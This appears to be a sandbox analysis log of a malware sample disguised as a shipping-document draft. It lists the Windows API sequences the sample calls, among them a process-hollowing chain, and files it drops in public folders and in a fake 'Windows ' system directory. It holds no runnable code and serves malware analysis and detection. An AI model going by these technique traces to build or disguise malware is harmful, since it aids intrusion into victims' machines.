Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BC7B4 NtCreateFile,NtWriteFile, 0_2_028BC7B4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BC724 NtDeleteFile, 0_2_028BC724
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B7A94 NtWriteVirtualMemory, 0_2_028B7A94
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BDA24 NtQueryInformationProcess, 0_2_028BDA24
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BC898 NtOpenFile,NtReadFile, 0_2_028BC898
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BD9A4 NtQueryInformationProcess, 0_2_028BD9A4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B7944 NtAllocateVirtualMemory, 0_2_028B7944
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B81B6 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BC6AC NtDeleteFile, 0_2_028BC6AC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028BC7B2 NtCreateFile,NtWriteFile, 0_2_028BC7B2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B7A92 NtWriteVirtualMemory, 0_2_028B7A92
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B7942 NtAllocateVirtualMemory, 0_2_028B7942
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279580EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 0_2_279580EF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 0_2_2795D58F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795BB09 OpenProcess,NtSuspendProcess,CloseHandle, 0_2_2795BB09
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795BB35 OpenProcess,NtResumeProcess,CloseHandle, 0_2_2795BB35
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile, 0_2_279532D2
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken, 5_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 5_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC8898C NtQueryInformationToken, 5_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 5_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 5_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 5_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 5_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 5_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken, 6_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 6_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC8898C NtQueryInformationToken, 6_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 6_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 6_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 6_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 6_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 6_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken, 9_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 9_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC8898C NtQueryInformationToken, 9_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 9_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 9_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 9_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 9_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 9_2_00007FF70CC888C0
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A39890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey, 16_2_00007FF7E0A39890
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken, 31_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 31_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC8898C NtQueryInformationToken, 31_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 31_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 31_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 31_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 31_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 31_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError, 32_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 32_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken, 32_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 32_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC8898C NtQueryInformationToken, 32_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 32_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 32_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 32_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken, 34_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 34_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC8898C NtQueryInformationToken, 34_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 34_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 34_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 34_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 34_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 34_2_00007FF70CC888C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 36_2_0040DD85
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00401806 NtdllDefWindowProc_W, 36_2_00401806
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_004018C0 NtdllDefWindowProc_W, 36_2_004018C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_004016FD NtdllDefWindowProc_A, 37_2_004016FD
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_004017B7 NtdllDefWindowProc_A, 37_2_004017B7
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC75240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 5_2_00007FF70CC75240
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B81B8 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_279567B9
Source: C:\Users\Public\alpha.exe File created: C:\Windows
Source: C:\Users\Public\alpha.exe File created: C:\Windows \System32
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
Source: C:\Users\Public\alpha.exe File deleted: C:\Windows \System32
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40117194 0_2_40117194
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_4010B5C1 0_2_4010B5C1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028A20C4 0_2_028A20C4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27976FEA 0_2_27976FEA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2797DE9D 0_2_2797DE9D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27975E5E 0_2_27975E5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2797E558 0_2_2797E558
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279774E6 0_2_279774E6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2799332B 0_2_2799332B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2797E2FB 0_2_2797E2FB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279861F0 0_2_279861F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27973946 0_2_27973946
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2797E0CC 0_2_2797E0CC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279778FE 0_2_279778FE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795DB62 0_2_2795DB62
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2796739D 0_2_2796739D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27967BAF 0_2_27967BAF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27966E0E 0_2_27966E0E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27967A46 0_2_27967A46
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_0040E800 1_2_0040E800
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_0040C838 1_2_0040C838
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_0040F1CA 1_2_0040F1CA
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_00411250 1_2_00411250
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_004102D0 1_2_004102D0
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_0040B2E7 1_2_0040B2E7
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_004102F0 1_2_004102F0
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_004105F0 1_2_004105F0
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_00410673 1_2_00410673
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_004106B9 1_2_004106B9
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC77D30 5_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC85554 5_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC7AA54 5_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC837D8 5_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC7CE10 5_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC78DF8 5_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9D9D0 5_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC781D4 5_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CCA1538 5_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC76EE4 5_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC97F00 5_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC80A6C 5_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9EE88 5_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC7E680 5_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9AA30 5_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC74A30 5_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC84224 5_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC72220 5_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC7D250 5_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC79E50 5_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC77650 5_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC75240 5_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC76BE0 5_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC73410 5_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9AFBC 5_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC75B70 5_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC73F90 5_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC7372C 5_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC79B50 5_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC7B0D8 5_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC78510 5_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC818D4 5_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC71884 5_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC72C48 5_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC87854 5_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9AC4C 5_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC77D30 6_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC85554 6_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC7AA54 6_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC837D8 6_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC7CE10 6_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC78DF8 6_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC9D9D0 6_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC781D4 6_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CCA1538 6_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC76EE4 6_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC97F00 6_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC80A6C 6_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC9EE88 6_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC7E680 6_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC9AA30 6_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC74A30 6_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC84224 6_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC72220 6_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC7D250 6_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC79E50 6_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC77650 6_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC75240 6_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC76BE0 6_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC73410 6_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC9AFBC 6_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC75B70 6_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC73F90 6_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC7372C 6_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC79B50 6_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC7B0D8 6_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC78510 6_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC818D4 6_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC71884 6_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC72C48 6_2_00007FF70CC72C48
